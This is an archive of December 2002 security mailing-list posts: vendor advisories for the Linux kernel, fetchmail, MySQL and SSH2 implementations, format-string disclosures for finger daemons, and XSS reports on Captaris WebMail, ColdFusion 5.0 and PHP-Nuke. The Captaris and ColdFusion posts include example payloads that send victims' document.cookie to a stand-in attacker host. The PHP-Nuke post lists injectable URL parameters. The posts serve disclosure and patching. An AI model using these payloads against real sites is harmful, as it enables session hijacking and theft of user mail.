Captaris (Infinite) WebMail XSS
I figured it was about time I hopped on the XSS band-wagon. Captaris (www.captaris.com) Infinite WebMail application is vulnerable to Cross-Site Scripting (XSS) attacks. The application fails to filter the following tags that can both be used to redirect a user to an attack script: Launch on e-mail open: http://attackers.server/cgi-bin/logger.cgi?' +document.cookie)"> Launch on mouse over: http://attackers.server/cgi-bin/logger.cgi?' +document.cookie\"> I am sure there are other XSS attack methods that can also be utilized to bypass their basic filtering. A sample vulnerable service is provided by dog.com (www.dogmail.com), they are running WebMail v3.61.05. A sample cookie and mail logger script that will retrieve all of the messages in the users main mailbox has been attached, and can also be found at http://pedram.redhive.com/advisories/dogmail.cgi -pedram http://pedram.redhive.com
Security Patchs for PHP Products
PHPSecure made some patchs for security holes in PHP products. Here is the list : - ALP - Banner Ad 2.0 : http://www.phpsecure.org/index.php?id=1&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=ALP - Tight Auction 3.0 : http://www.phpsecure.org/index.php?id=6&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=TightAuction - PY-Membres 3.1 : http://www.phpsecure.org/index.php?id=9&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=PY-Membres - dobermann FORUM 0.5 : http://www.phpsecure.org/index.php?id=8&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=dobermann FORUM - phpnewsDev 1 : http://www.phpsecure.org/index.php?id=10&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=phpnewsDev - KillerProtection 1 : http://www.phpsecure.org/index.php?id=11&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=KillerProtection - phpSecurePages 0.27b : http://www.phpsecure.org/index.php?id=12&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=phpSecurePages - Avotravis 2.1 : http://www.phpsecure.org/index.php?id=13&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=Avotravis - PunxNews 2.1 : http://www.phpsecure.org/index.php?id=14&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=PunxNews - phpforge 2.3 : http://www.phpsecure.org/index.php?id=15&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=phpforge - phpforge 3b2 : http://www.phpsecure.org/index.php?id=60&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=phpforge - Inertianews 0.02 beta : http://www.phpsecure.org/index.php?id=17&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=Inertianews - MySimpleNews 1 : http://www.phpsecure.org/index.php?id=16&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=MySimpleNews - Pollen 1.4.1 : http://www.phpsecure.org/index.php?id=18&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=Pollen - Pphlogger (Power Phlogger) 2.0.9 : http://www.phpsecure.org/index.php?id=7&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=Pphlogger (Power Phlogger) - News Evolution 1.0 : http://www.phpsecure.org/index.php?id=21&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=News Evolution - News Evolution 2.0 : http://www.phpsecure.org/index.php?id=22&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=News Evolution - LokwaBB 1.2.2 : http://www.phpsecure.org/index.php?id=23&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=LokwaBB - Rose 4.52 : http://www.phpsecure.org/index.php?id=24&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=Rose - WebChat for XOOPS RC3 1-5 : http://www.phpsecure.org/index.php?id=25&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=WebChat for XOOPS RC3 - EasyNews 4.2 , 4.3 : http://www.phpsecure.org/index.php?id=26&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=EasyNews - Mon Album 0.6.2d : http://www.phpsecure.org/index.php?id=27&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=Mon Album - XOOPS RC3 : http://www.phpsecure.org/index.php?id=61&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=XOOPS - Photo Db 1.4 : http://www.phpsecure.org/index.php?id=28&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=Photo Db - PHP Image View 1.0 : http://www.phpsecure.org/index.php?id=29&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=PHP Image View - mcPass 1 : http://www.phpsecure.org/index.php?id=30&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=mcPass - Pseudo-Frame 1.0 : http://www.phpsecure.org/index.php?id=31&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=Pseudo-Frame - SimpleBBS 1.0.3 : http://www.phpsecure.org/index.php?id=32&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=SimpleBBS - SimpleBBS 1.0.6 : http://www.phpsecure.org/index.php?id=33&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=SimpleBBS - WSC (Web Server Creator) - Web Portal 0.1 : http://www.phpsecure.org/index.php?id=34&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=WSC (Web Server Creator) - Web Portal - Immobilier 1 : http://www.phpsecure.org/index.php?id=35&zone=pDl More details : http://online.securityfocus.com/search?category=22&query=Immobilier - FreeNews 2.1 : http://www.phpsecure.org/index.php?i
[CLA-2002:553] Conectiva Linux Security Announcement - kernel 2.4
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- CONECTIVA LINUX SECURITY ANNOUNCEMENT - -- PACKAGE : kernel 2.4 SUMMARY : Local denial of service vulnerability DATE : 2002-12-16 17:41:00 ID: CLA-2002:553 RELEVANT RELEASES : 7.0, 8 - - DESCRIPTION The Linux kernel is responsible for handling the basic functions of the Conectiva Linux operating system. Christophe Devine reported[1] a vulnerability in versions prior to 2.4.20 of the linux kernel that could be exploited by a local non-root user to completely "freeze" the machine. A local attacker could exploit this vulnerability to cause a Denial of Service (DoS) condition. This update fixes this problem. Please note that the updated kernel packages here listed are available in our update servers since November 20, 2002. SOLUTION All users should upgrade the kernel immediately. IMPORTANT: it is not possible to use apt to apply kernel updates. These packages have to be updated manually. Generic kernel update instructions can be found in our updates page[2]. Kernel 2.2 users in Conectiva Linux 6.0 and 7.0 are also vulnerable to this issue. It is recommended that these users upgrade to the latest (2.4) kernel, but updated packages for the 2.2 series are being prepared and will be released in a near future. REFERENCES: 1.http://online.securityfocus.com/archive/1/299687/2002-11-11/2002-11-17/0 2.http://distro.conectiva.com.br/atualizacoes/?idioma=en UPDATED PACKAGES ftp://atualizacoes.conectiva.com.br/7.0/RPMS/kernel-2.4.12-4U70_4cl.i386.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/kernel-2.4.12-4U70_4cl.i586.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/kernel-2.4.12-4U70_4cl.i686.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/kernel-BOOT-2.4.12-4U70_4cl.i386.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/kernel-doc-2.4.12-4U70_4cl.i386.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/kernel-enterprise-2.4.12-4U70_4cl.i686.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/kernel-headers-2.4.12-4U70_4cl.i386.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/kernel-smp-2.4.12-4U70_4cl.i386.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/kernel-smp-2.4.12-4U70_4cl.i586.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/kernel-smp-2.4.12-4U70_4cl.i686.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/kernel-source-2.4.12-4U70_4cl.i386.rpm ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/kernel-2.4.12-4U70_4cl.src.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-2.4.19-1U80_5cl.i386.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-2.4.19-1U80_5cl.i586.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-2.4.19-1U80_5cl.i686.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-BOOT-2.4.19-1U80_5cl.i386.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-doc-2.4.19-1U80_5cl.i386.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-enterprise-2.4.19-1U80_5cl.i686.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-headers-2.4.19-1U80_5cl.i386.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-rbc-2.4.19-1U80_5cl.i386.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-smp-2.4.19-1U80_5cl.i386.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-smp-2.4.19-1U80_5cl.i586.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-smp-2.4.19-1U80_5cl.i686.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-source-2.4.19-1U80_5cl.i386.rpm ftp://atualizacoes.conectiva.com.br/8/SRPMS/kernel-2.4.19-1U80_5cl.src.rpm ADDITIONAL INSTRUCTIONS Users of Conectiva Linux version 6.0 or higher may use apt to perform upgrades of RPM packages: - run: apt-get update - after that, execute: apt-get upgrade Detailed instructions reagarding the use of apt and upgrade examples can be found at http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en - - All packages are signed with Conectiva's GPG key. The key and instructions on how to import it can be found at http://distro.conectiva.com.br/seguranca/chave/?idioma=en Instructions on how to check the signatures of the RPM packages can be found at http://distro.conectiva.com.br/seguranca/politica/?idioma=en - - All our advisories and generic update instructions can be viewed at http://distro.conectiva.com.br/atualizacoes/?idioma=en - - subscribe: [EMAIL PROTECTED] unsubscribe: [EMAIL PROTECTED] -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE9/iyB42jd0JmAcZARAtowAKCrKe0jynFrgxg73SN2sXQp169x9ACfXK3U Ey8KmP/NTc16x3SEyjFBQzw= =aOtt -END PG
[CLA-2002:554] Conectiva Linux Security Announcement - fetchmail
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- CONECTIVA LINUX SECURITY ANNOUNCEMENT - -- PACKAGE : fetchmail SUMMARY : Remote vulnerability DATE : 2002-12-16 18:38:00 ID: CLA-2002:554 RELEVANT RELEASES : 6.0, 7.0, 8 - - DESCRIPTION Fetchmail is a popular mail retrieval and forwarding utility. Stefan Esser discovered[1] a buffer overflow vulnerability in fetchmail versions prior to 6.1.3 (inclusive) that can be exploited remotelly with the use of specially crafted mail messages. By exploiting this the attacker can crash fetchmail or execute arbitrary code with the privileges of the user running it. The updated packages listed in this announcement include a fix for this problem. SOLUTION All fetchmail users should upgrade. IMPORTANT: if fetchmail is running as a daemon, it will have to be restarted in order to run the new version. REFERENCES: 1.http://security.e-matters.de/advisories/052002.html UPDATED PACKAGES ftp://atualizacoes.conectiva.com.br/6.0/RPMS/fetchmail-5.9.12-1U60_4cl.i386.rpm ftp://atualizacoes.conectiva.com.br/6.0/RPMS/fetchmailconf-5.9.12-1U60_4cl.i386.rpm ftp://atualizacoes.conectiva.com.br/6.0/RPMS/fetchmail-doc-5.9.12-1U60_4cl.i386.rpm ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/fetchmail-5.9.12-1U60_4cl.src.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/fetchmail-5.9.12-1U70_4cl.i386.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/fetchmailconf-5.9.12-1U70_4cl.i386.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/fetchmail-doc-5.9.12-1U70_4cl.i386.rpm ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/fetchmail-5.9.12-1U70_4cl.src.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/fetchmail-5.9.12-1U80_3cl.i386.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/fetchmailconf-5.9.12-1U80_3cl.i386.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/fetchmail-doc-5.9.12-1U80_3cl.i386.rpm ftp://atualizacoes.conectiva.com.br/8/SRPMS/fetchmail-5.9.12-1U80_3cl.src.rpm ADDITIONAL INSTRUCTIONS Users of Conectiva Linux version 6.0 or higher may use apt to perform upgrades of RPM packages: - run: apt-get update - after that, execute: apt-get upgrade Detailed instructions reagarding the use of apt and upgrade examples can be found at http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en - - All packages are signed with Conectiva's GPG key. The key and instructions on how to import it can be found at http://distro.conectiva.com.br/seguranca/chave/?idioma=en Instructions on how to check the signatures of the RPM packages can be found at http://distro.conectiva.com.br/seguranca/politica/?idioma=en - - All our advisories and generic update instructions can be viewed at http://distro.conectiva.com.br/atualizacoes/?idioma=en - - subscribe: [EMAIL PROTECTED] unsubscribe: [EMAIL PROTECTED] -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE9/joG42jd0JmAcZARAhVoAKCCEdNq54z6l0awS+fXic41wITlzwCgkK4V uLsP1zCVD/TX0agAqMk+TwA= =dKgG -END PGP SIGNATURE-
RE: PFinger 0.7.8 format string vulnerability (#NISR16122002B)
Hello, > Due to the way requests are logged the only way to exploit this > vulnerability is through setting the DNS name of the fingering host to the > attacker supplied format string. I really wonder how you want to exploit this... Last time I checked all tested resolvers (Linux/BSD/Solaris) did not allow % within domain names and so your format string vulnerability is not exploitable at all... Stefan Esser
PFinger 0.7.8 format string vulnerability (#NISR16122002B)
NGSSoftware Insight Security Research Advisory Name: PFinger Format String vulnerability Systems: PFinger version 0.7.8 and earlier Severity: High Risk Vendor URL: http://www.xelia.ch/unix/pfinger/ Author: David Litchfield ([EMAIL PROTECTED]) Advisory URL: http://www.ngssoftware.com/advisories/pfinger.txt Date: 16th December 2002 Advisory number: #NISR16122002B Description *** PFinger is an open-source replacement of the GNU Finger daemon. PFinger suffers from a format string vulnerability that, when exploited, can allow the remote execution of arbitrary code. Details *** The format string vulnerability arises due to an unsafe call to syslog() in the log() function of log.c .. syslog(level, syslog_mem); .. To make this safe a format string should be specified: .. syslog(level,"%s", syslog_mem); .. Due to the way requests are logged the only way to exploit this vulnerability is through setting the DNS name of the fingering host to the attacker supplied format string. h_ent = gethostbyaddr((char *)&remaddr.sin_addr, sizeof(remaddr.sin_addr), AF_INET); if (h_ent) conn.hostname = strdup(h_ent->h_name); else conn.hostname = "(remote)"; log(LOG_INFO, "Connection from %s (%s)",conn.hostname,inet_ntoa(remaddr.sin_addr)); This code looks up the Domain name of the fingering host and logs the connection information. This appears to be the only place where user controlled data is logged. For exploitation to succeed the attacker must either control their own DNS, the DNS server of the target host or alternatively spoof the DNS reply. This makes exploitation more difficult but by no means impossible. Fix Information *** NGSSoftware alerted the author of PFinger with this problem on the 27th of November, 2002. The author has responded and assured NGS that a fix will be implemented shortly. Those who are comfortable with C and cc/gcc can fix this themselves by editing log.c in the manner described in the "Details" section above. A check for this issue has been added to Typhon III, NGSSoftware's advanced vulnerability assessment tool, of which, more information is available at the NGSSite: http://www.ngssoftware.com/ For more information about format string vulnerabilities please read http://www.nextgenss.com/papers/win32format.doc http://julianor.tripod.com/usfs.html About NGSSoftware * NGSSoftware design, research and develop intelligent, advanced application security assessment scanners. Based in the United Kingdom, NGSSoftware have offices in the South of London and the East Coast of Scotland. NGSSoftware's sister company NGSConsulting, offers best of breed security consulting services, specialising in application, host and network security assessments. http://www.ngssoftware.com/ http://www.ngsconsulting.com/ Telephone +44 208 401 0070 Fax +44 208 401 0076 [EMAIL PROTECTED]
zkfingerd 0.9.1 format string vulnerabilities (#NISR16122002A)
NGSSoftware Insight Security Research Advisory
Name: zkfingerd Format String vulnerability
Systems: zkfingerd version 0.9.1 and earlier
Severity: High Risk
Vendor URL: http://sourceforge.net/projects/zkfingerd
Author: David Litchfield ([EMAIL PROTECTED])
Advisory URL: http://www.ngssoftware.com/advisories/zkfingerd.txt
Date: 16th December 2002
Advisory number: #NISR16122002A
Description
***
zkfingerd is an open-source replacement for standard finger daemons running
on Linux systems. zkfingerd suffers from several format string
vulnerabilities that, when exploited, can allow the remote execution of
arbitrary code.
Details
***
The first format string vulnerability can be found in the putlog() function
of log.c. An unsafe call is made to the syslog() function.
..
syslog(LOG_INFO, c);
..
To make this safe a format string should be specified:
..
syslog(LOG_INFO,"%s", c);
..
By fingering a "user" and designing a special format string as the user, it
is possible to overwrite arbitray locations in memory with values supplied
by an attacker using the %n specifier. This can lead to arbitrary code
execution.
Further format string vulnerabilities, that all have the same root cause,
are due to the say() function:
void
say(char *fmt, ...)
{
va_list ap;
va_start(ap, fmt);
vprintf(fmt, ap);
va_end(ap);
printf("\r\n");
fflush(stdout);
return;
}
If, when say() is called, the first argument is not a format string but
input a remote user can control then the vulnerability will manifest itself.
One such place is in the file_list() function:
if(S_ISDIR(st.st_mode))
{
char*y, *z;
files++;
z = xmalloc(strlen(de->d_name) + 2);
strcpy(z, de->d_name);
strcat(z, "/");
x = xmalloc(32 + strlen(de->d_name));
y = my_ctime(st.st_mtime);
sprintf(x, "\t%-12s\t%s\t-- DIR --", z, y);
say(x);
xfree(x);
xfree(y);
xfree(z);
continue;
}
In this case if the name of a directory contains an attacker supplied format
string then it can overwrite arbitrary locations in memory with attacker
supplied values.
Fix Information
***
NGSSoftware alerted the author of zkfingerd with these problems on the 27th
of November, 2002. The author responed quickly and made the relevant
security fixes. Patched source code can be download from CVS @ Sourceforge.
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/zkfingerd/zkfingerd/src/
A check for this issue has been added to Typhon III, NGSSoftware's advanced
vulnerability assessment tool, of which, more information is available at
the NGSSite: http://www.ngssoftware.com/
For more information about format string vulnerabilities please read
http://www.nextgenss.com/papers/win32format.doc
http://julianor.tripod.com/usfs.html
About NGSSoftware
*
NGSSoftware design, research and develop intelligent, advanced application
security assessment scanners. Based in the United Kingdom, NGSSoftware have
offices in the South of London and the East Coast of Scotland. NGSSoftware's
sister company NGSConsulting, offers best of breed security consulting
services, specialising in application, host and network security
assessments.
http://www.ngssoftware.com/
http://www.ngsconsulting.com/
Telephone +44 208 401 0070
Fax +44 208 401 0076
[EMAIL PROTECTED]
Re: Cross-site scripting vulnerability in CF 5.0
Something to note: The 'view admin log' feature in CF tends to cause stress on the CF process, and also blocks the log file during opening. So, It's generally a better (and safer, with this cross-site scripting problem that's been around for years) to view the logs file via a text viewer on the sytem. By default, it's c:\cfusion\log\*.log On Mon, 16 Dec 2002, KiLL CoLe wrote: > Cross-site scripting vulnerability in CF 5.0. This > issue was brought up to macromedia on July 22nd, 2002. > Macromedia issued a fix to me, but I have not seen the > fix available to the public. the coldfusion > administrator allows you to view your application log > via your web browser. Under certain conditions, it is > possible to remotely alter coldfusions application > log. take the following code: > > >SELECT * FROM Products >Where ProductId = #int(url.productid)# > > > if the INT function encounters a value that is not > numeric, it throws an exception and writes the value > that was passed to application.log. Should an > unsuspecting administrator view the log file via their > web browser, script could be executed. Analyze this > code: > if url.productid (from the above example) were passed > in as: > > > document.frame1.location="http://www.domain.com/index.cfm?stealcookie="; > + document.cookie > > this would enable an attacker to steal the value of > the coldfusion administrators cookie. Decrypting the > coldfusion admin's password is well documented, and > exposes a mild-moderate threat to server security. > > **NOTE: there are dozens of other functions that throw > exceptions similar to the INT function. > > __ > Do you Yahoo!? > Yahoo! Mail Plus - Powerful. Affordable. Sign up now. > http://mailplus.yahoo.com > >
Cross-site scripting vulnerability in CF 5.0
Cross-site scripting vulnerability in CF 5.0. This issue was brought up to macromedia on July 22nd, 2002. Macromedia issued a fix to me, but I have not seen the fix available to the public. the coldfusion administrator allows you to view your application log via your web browser. Under certain conditions, it is possible to remotely alter coldfusions application log. take the following code: SELECT * FROM Products Where ProductId = #int(url.productid)# if the INT function encounters a value that is not numeric, it throws an exception and writes the value that was passed to application.log. Should an unsuspecting administrator view the log file via their web browser, script could be executed. Analyze this code: if url.productid (from the above example) were passed in as: document.frame1.location="http://www.domain.com/index.cfm?stealcookie="; + document.cookie this would enable an attacker to steal the value of the coldfusion administrators cookie. Decrypting the coldfusion admin's password is well documented, and exposes a mild-moderate threat to server security. **NOTE: there are dozens of other functions that throw exceptions similar to the INT function. __ Do you Yahoo!? Yahoo! Mail Plus - Powerful. Affordable. Sign up now. http://mailplus.yahoo.com
RE: Cross-site scripting vulnerability in CF 5.0
Does anyone have information on whether the same issue affects ColdFusion MX? __ Patrick K. Correia, Web Designer Clough, Harbour & Associates LLP http://www.cha-llp.com -Original Message- From: KiLL CoLe [mailto:[EMAIL PROTECTED]] Sent: Monday, December 16, 2002 1:16 PM To: [EMAIL PROTECTED] Subject: Cross-site scripting vulnerability in CF 5.0
PHP-Nuke 6.0 : Path Disclosure & Cross Site Scripting
Informations :
°°
Product : PHP-Nuke
Version : 6.0
Website : http://www.phpnuke.org
Problems :
- Path Disclosure
- XSS
Developpement :
°°°
The majority of the PHPNuke's files are includes in modules.php or
index.php. To prevent the direct access, PHPNuke made two kinds of safety.
The first one (e.g. in modules/Downloads/index.php) is :
---
if (!eregi("modules.php", $PHP_SELF)) {
die ("You can't access this file directly...");
}
---
The second one (e.g. footer.php ) :
if (eregi("footer.php",$PHP_SELF)) {
Header("Location: index.php");
die();
}
Some files haven't these safety measures but they have security holes.
Exploits :
°°
Path Disclosure :
http://[target]/modules/Downloads/voteinclude.php
http://[target]/modules/Your_Account/navbar.php
http://[target]/modules/Forums/attachment.php
http://[target]/modules/Forums/auth.php
http://[target]/modules/News/comments.php
http://[target]/modules/Private_Messages/functions.php
http://[target]/modules/Private_Messages/index.php
http://[target]/modules/Private_Messages/read.php
http://[target]/modules/Private_Messages/reply.php
http://[target]/modules/Web_Links/voteinclude.php
http://[target]/modules/WebMail/contactbook.php?user=1
Path Disclosure & Cross Site Scripting :
- http://[target]/modules/Forums/bb_smilies.php?name=[SCRIPT]
or http://[target]/modules/Forums/bb_smilies.php?Default_Theme=[SCRIPT]
or
http://[target]/modules/Forums/bb_smilies.php?site_font=}-->[SCRIPT]
or http://[target]/modules/Forums/bb_smilies.php?bgcolor1=";>[SCRIPT]
or with :
$sitename
$table_width
$color1
$forumver
- /modules/Forums/bbcode_ref.php with :
$name
$Default_Theme
$site_font
$sitename
$bgcolor2
$textcolor1
$bgcolor1
$forumver
- /modules/Forums/editpost.php, /modules/Forums/newtopic.php,
/modules/Forums/reply.php, /modules/Forums/topicadmin.php,
/modules/Forums/viewforum.php with :
$name
- /modules/Forums/searchbb.php with :
$name
$bgcolor3
$bgcolor1
Patch :
°°°
A patch can be found on http://www.phpsecure.org .
More details :
°°
In French :
http://www.frog-man.org/tutos/PHPNuke6.0.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FPHPNuke6.0.txt&langpair=fr%7Cen&hl=en&ie=ASCII&oe=ASCII
frog-m@n
_
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp
R7-0009: Vulnerabilities in SSH2 Implementations from Multiple Vendors
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Rapid 7, Inc. Security Advisory
Visit http://www.rapid7.com/ to download NeXpose(tm), our
advanced vulnerability scanner. Linux and Windows 2000
versions are available now!
___
Rapid 7 Advisory R7-0009
Vulnerabilities in SSH2 Implementations from Multiple Vendors
Published: December 16, 2002
Revision: 1.0
http://www.rapid7.com/advisories/R7-0009.txt
CERT: CA-2002-36
http://www.cert.org/advisories/CA-2002-36.html
CVE:Multiple CVE CANs assigned:
o CAN-2002-1357 (incorrect length)
o CAN-2002-1358 (lists with empty elements/empty strings)
o CAN-2002-1359 (large packets and large fields)
o CAN-2002-1360 (string fields with zeros)
1. Affected system(s):
KNOWN VULNERABLE:
o F-Secure Corp. SSH servers and clients for UNIX
v3.1.0 (build 11) and earlier
o F-Secure Corp. SSH for Windows
v5.2 and earlier
o SSH Communications Security, Inc. SSH for Windows
v3.2.2 and earlier
o SSH Communications Security, Inc. SSH for UNIX
v3.2.2 and earlier
o FiSSH SSH client for Windows
v1.0A and earlier
o InterSoft Int'l, Inc. SecureNetTerm client for Windows
v5.4.1 and earlier
o NetComposite ShellGuard SSH client for Windows
v3.4.6 and earlier
o Pragma Systems, Inc. SecureShell SSH server for Windows
v2 and earlier
o PuTTY SSH client for Windows
v0.53 and earlier (v0.53b not affected)
o WinSCP SCP client for Windows
v2.0.0 and earlier
APPARENTLY NOT VULNERABLE:
o BitVise WinSSHD server for Windows v3.05
o LSH v1.5
o OpenSSH v3.5 and earlier
o TTSSH SSH Extension for TeraTerm Pro
o VanDyke SecureCRT client v3.4.3 for Windows
o VanDyke VShell server v1.2 for Windows
UNKNOWN / NOT TESTED:
o MacSSH
o SSHv1 implementations (see {1})
o SSHv2 enabled network appliances
2. Summary
SSH servers and clients from several vendors contain vulnerabilities
that may allow denial-of-service attacks and/or arbitrary code
execution. The vulnerabilities arise from various deficiencies in
the greeting and key-exchange-initialization phases of the SSHv2
transport layer.
3. Vendor status and information
F-Secure Corporation
http://www.f-secure.com
Vendor has been notified. Release information is unknown at
this time. F-Secure has characterized this issue as not
exploitable.
FiSSH
http://pgpdist.mit.edu/FiSSH/index.html
Vendor has been notified. Release information is unknown at
this time.
NetComposite (ShellGuard)
http://www.shellguard.com
Vendor has been notified. Release information is unknown at
this time.
Pragma Systems, Inc.
http://www.pragmasys.com
Vendor has been notified. The fixed version is SecureShell
v3.0, which was released on November 25 2002.
PuTTY
http://www.chiark.greenend.org.uk/~sgtatham/putty/
Vendor has been notified. The fixed version is PuTTY v0.53b,
which was released on November 12, 2002.
SSH Communications Security, Inc.
http://www.ssh.com
Vendor has been notified. Release information is unknown at
this time. SSH, Inc. has characterized this issue as not
exploitable.
SecureNetTerm (InterSoft International, Inc.)
http://www.securenetterm.com
Vendor notified. The fixed version is SecureNetTerm v5.4.2,
released on November 14 2002.
WinSCP2
http://winscp.vse.cz/eng/
Vendor has been notified. Release information is unknown at
this time.
4. Solution
No solutions available yet.
5. Detailed analysis
To study the correctness and security of SSH server and client
implementations {2}, the security research team at Rapid 7, Inc.
has designed the SSHredder SSH protocol test suite containing
hundreds of sample SSH packets. These invalid and/or atypical
SSH packets focus on the greeting and KEXINIT (key exchange
initialization) phases of SSH connections.
We then applied the SSHredder suite to some popular SSH servers
and clients, observing their behavior when presented with a
range of different input. Several implementation errors were
discovered, most of which involve memory access violations.
While the impact is different for each product tested, some of
these errors were easily exploitable, allowing the attacker to
overwrite the stack pointer with arbitrary data.
In most cases, only the most current versions of the applications
were tested. Vendors listed as "Apparently NOT VULNERABLE" are
encouraged to run the tests against older versions of their
applications.
The SSHr
[OpenPKG-SA-2002.013] OpenPKG Security Advisory (mysql)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 OpenPKG Security AdvisoryThe OpenPKG Project http://www.openpkg.org/security.html http://www.openpkg.org [EMAIL PROTECTED] [EMAIL PROTECTED] OpenPKG-SA-2002.013 16-Dec-2002 Package: mysql Vulnerability: password bypass, arbitrary code execution OpenPKG Specific:no Dependent Packages: apache, myodbc, perl-dbi, postfix Affected Releases: Affected Packages: Corrected Packages: OpenPKG 1.0 <= mysql-3.23.46-1.0.0 >= mysql-3.23.46-1.0.1 OpenPKG 1.1 <= mysql-3.23.52-1.1.0 >= mysql-3.23.52-1.1.1 OpenPKG CURRENT <= mysql-3.23.53-20021204 >= mysql-3.23.54-20021212 Description: The e-matters [0] company discovered two flaws [1] within the MySQL [2] server that can be used by any MySQL user to crash the server. One of the flaws can be used to bypass the MySQL password check or to execute arbitrary code with the privileges of the user running mysqld(8). They also discovered an arbitrary size heap overflow within the MySQL client library and another vulnerability that allows to write '\0' to any memory address. Both flaws could allow DOS attacks against or arbitrary code execution within anything linked against libmysqlclient. Check whether you are affected by running "/bin/rpm -q mysql". If you have an affected version of the "mysql" package (see above), please upgrade it according to the solution below. Solution: Update existing packages to newly patched versions of MySQL. Select the updated source RPM appropriate for your OpenPKG release [3][4][5], and fetch it from the OpenPKG FTP service or a mirror location. Verify its integrity [6], build a corresponding binary RPM from it and update your OpenPKG installation by applying the binary RPM [7]. For the latest OpenPKG 1.1 release, perform the following operations to permanently fix the security problem (for other releases adjust accordingly). $ ftp ftp.openpkg.org ftp> bin ftp> cd release/1.1/UPD ftp> get mysql-3.23.52-1.1.1.src.rpm ftp> bye $ /bin/rpm -v --checksig mysql-3.23.52-1.1.1.src.rpm $ /bin/rpm --rebuild mysql-3.23.52-1.1.1.src.rpm $ su - # /bin/rpm -Fvh /RPM/PKG/mysql-3.23.52-1.1.1.*.rpm # /etc/rc mysql stop start References: [0] http://www.e-matters.de/ [1] http://security.e-matters.de/advisories/042002.html [2] http://www.mysql.com/ [3] ftp://ftp.openpkg.org/release/1.0/UPD/ [4] ftp://ftp.openpkg.org/release/1.1/UPD/ [5] ftp://ftp.openpkg.org/current/SRC/ [6] http://www.openpkg.org/security.html#signature [7] http://www.openpkg.org/tutorial.html#regular-source For security reasons, this advisory was digitally signed with the OpenPGP public key "OpenPKG <[EMAIL PROTECTED]>" (ID 63C4CB9F) of the OpenPKG project which you can find under the official URL http://www.openpkg.org/openpkg.pgp or on http://keyserver.pgp.com/. To check the integrity of this advisory, verify its digital signature by using GnuPG (http://www.gnupg.org/). For example, pipe this message to the command "gpg --verify --keyserver keyserver.pgp.com". -BEGIN PGP SIGNATURE- Comment: OpenPKG <[EMAIL PROTECTED]> iEYEARECAAYFAj39rFwACgkQgHWT4GPEy59OOQCfRNp25g3jXbRoIITZnwnpT7lo 0q8AoMCazmZmwIs0sqxUJF4wfwbsC6Zz =6WvF -END PGP SIGNATURE-
GLSA: exim
